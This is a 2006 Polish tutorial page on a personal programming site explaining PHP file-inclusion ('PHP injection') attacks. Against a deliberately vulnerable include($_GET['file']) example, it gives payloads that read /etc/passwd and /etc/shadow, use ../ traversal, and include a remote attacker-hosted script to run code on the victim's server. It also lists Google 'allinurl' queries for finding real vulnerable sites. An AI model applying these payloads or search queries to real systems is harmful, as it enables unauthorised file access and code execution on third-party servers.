• Informatyka
  • Programowanie
    • Assembler
      • Fraktal
      • Plazma
      • ? bajtów
      • Czytaj To
      • Satellite BBS
    • Język C
      • Makefile
      • Liczba Pi
      • Lisaju
      • Logika
      • Kompilator
      • Czat TCP/IP
      • Pliki konfiguracyjne
      • Killall
      • UART
      • RTC
      • Libmail
      • Kalkulator
      • Formater kodu
      • Kółko i krzyżyk
      • Zapałki
      • VESAlib
      • Game of Life
      • Erozja
      • Pożar lasu
      • Wyżarzanie
      • Errno
      • WARNING
    • MPI-CH
      • Całka
      • Suma szeregu
      • Mnożenie macierzy
      • Tangens
      • Rozmywanie obrazu
      • Wydajność
    • Java
      • Notatki SCJP, cz.1
      • Notatki SCJP, cz.2
      • Java Swing
    • PHP
      • Imieniny
  • Algorytmy w C
    • Listy jednokierunk.
    • Listy jednokierunk. 2
    • Listy jednokierunk. 3
    • Kod Graya
    • Odwrotna Notacja Polska
    • Permutacje
    • Base64
    • Więcej niż n/2
  • Linux
    • Kurs BASHa
      • Kurs
      • Przykłady
    • Instalacja
      • RedHat 6.2
      • MPI-CH
      • Frame buffer
    • Bezpieczeństwo
      • Podstawy
      • Analiza
    • Przydatne
    • Początek
  • Atmel AVR
    • Makefile
    • Wyświetlacz LCD
    • Encoder
    • Częstotliwości
    • KS0108
    • MODBUS
  • Strony WWW
  • Historia Informatyki
    • Blaise Pascal
    • Dennis M. Ritchie
    • Seymour Cray
    • Stare komputery
    • Atari 800XL
  • Artykuły
    • Zgrywus
    • Scroll tekstu
    • ? bajtów
    • *Astar
    • IDE dla Watcom
    • Obiekty 3DS
    • Biblioteka graficzna
    • Plazma
    • 13H jeszcze raz
  • Projekty
    • Głowa humanoida
    • Sterowanie
    • Maszyna 1
    • Maszyna 2
    • KSSZ3
    • Programator prostownika
    • Bufor danych
    • MRMiCZ
    • MSSZ1
  • Sieci
    • Kable
    • Cisco
      • Galeria
  • SEO i optymalizacja
    • Narzędzia
  • Hacking
    • Buffer Overflow
    • PHP injection
  • Gry
    • He
• Astronomia
  • Układ Słoneczny
  • Martian Deed
• Robotyka
  • Narodziny robotyki
• O autorze

PHP injection

    -- Sebastian Pawlak, 2006.

Wiele stron stworzonych w PHP wykorzystuje przekazywanie parametrów postaci: http://adres/index.php?parametr1=wartosc1&parametr2=wartosc2. Problem pojawia się wtedy, kiedy twórca takiej strony przez parametr przekazuje odniesienie do jakiegoś pliku na swoim serwerze, który to plik jest dołączany do zawartości poprzez funkcję include(). Można wtedy spreparować odniesienie do pliku przekazywane jako parametr w ten sposób, aby wskazywało na plik zdalny bądź inny, niż zamierzone przez autora strony, plik na serwerze lokalnym.
Przykładowo, autor strony zrealizował ją w mniej więcej taki sposób:

 <HTML>
 <TITLE>Moja strona</TITLE>
 <BODY>
  <A href="index.php?file=witaj.php">Witaj na mojej stronie</A>
  <A href="index.php?file=oautorze.php">O autorze</A>
  <?PHP
   if (!isset($_GET["file"]))
       include("witaj.php");
   else
       include($_GET["file"]);
  ?>
 </BODY>
</HTML>

Możemy spróbować wyświetlić jakiś inny, niż zamierzone przez autora strony, plik: http://adres_strony/index.php?file=/etc/passwd. Jeśli serwer działa z prawami roota, można spróbować wyświetlić plik /etc/shadow. Niektórzy autorzy, podatnych na opisane ataki, stron tworzą zabezpieczenie poprzez usunięcie pierwszego slasha (jeśli występuje on) z łańcucha znaków przekazywanego jako parametr (jeśli przekażemy /etc/passwd, to skrypt przekształca ten napis na: etc/passwd). W ten sposób autorzy próbują zabezpieczyć się przed możliwością dostępu do pliku spoza lokalnego katalogu. W takim przypadku można spróbować użyć konstrukcji: ../../../../../../../../etc/passwd.
Można także wykonać dowolny skrypt PHP na serwerze ofiary. W tym celu na dostępnym dla nas koncie wystawiamy plik ze skryptem (plik nie może mieć rozszerzenia .php, aby nie wykonał się przed pobraniem). Następnie wywołujemy stronę ofiary: http://adres_strony/index.php?file=http://adres_strony_ze_skryptem/skrypt. Autor strony nie powinien korzystać z PHP z włączoną opcją safe mode.

Jak znaleźć strony podatne na opisane powyżej techniki ataku?
Z pomocą przychodzi nam Google. Mi udało się odnaleźć kilka podatnych stron poprzez zapytania:
allinurl: index.php?file=
allinurl: index.php?url=
allinurl: index.php3?file=
allinurl: index.php3?url=